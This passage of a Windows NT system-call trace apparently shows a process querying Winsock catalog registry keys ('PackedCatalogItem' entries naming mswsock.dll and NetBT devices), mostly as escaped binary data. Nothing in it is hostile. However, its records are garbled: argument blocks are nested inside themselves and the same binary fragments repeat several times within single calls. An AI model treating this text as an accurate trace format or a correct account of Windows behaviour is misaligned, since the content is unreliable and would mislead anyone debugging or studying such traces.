0\24\0\0\0\24\0\0\0\5\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0\14\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\14\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\15\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\0\15\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\16\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\16\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\17\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\16\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\17\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\23\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0\14\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\14\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\15\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\08\0\15\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\16\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\16\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\17\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02572 896 NtClose (220, ... ) == 0x0 02573 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000008"}, ... 220, ) }, ... 220, ) == 0x0 02574 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02575 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02576 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\24\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0\21\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\21\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\22\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\0\22\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\23\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\23\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\24\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\24\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0\21\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\21\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\22\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\0\22\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\23\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\23\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\24\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\23\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\24\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\24\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\373\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0F\0C\0C\00\03\0A\04\01\0-\08\0C\0C\0C\0-\04\09\01\09\0-\0A\0\0\0\0\0\204\3\0\0\21\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\21\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\22\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\09\0\22\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\23\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\23\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\24\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02577 896 NtClose (220, ... ) == 0x0 02578 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000009"}, ... 220, ) }, ... 220, ) == 0x0 02579 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02580 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02581 896 NtAllocateVirtualMemory (-1, 1372160, 0, 4096, 4096, 4, ... 1372160, 4096, ) == 0x0 02582 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\25\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0\27\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\27\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\30\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0\30\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\31\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\31\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\32\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\25\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0\27\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\27\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\30\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0\30\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\31\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\31\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\32\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\31\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\32\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\25\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0\27\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\27\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\30\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0\30\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\31\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\31\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\32\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02583 896 NtClose (220, ... ) == 0x0 02584 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000010"}, ... 220, ) }, ... 220, ) == 0x0 02585 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02586 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02587 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\26\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0\34\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\34\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\35\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0\35\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\36\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\36\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\37\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0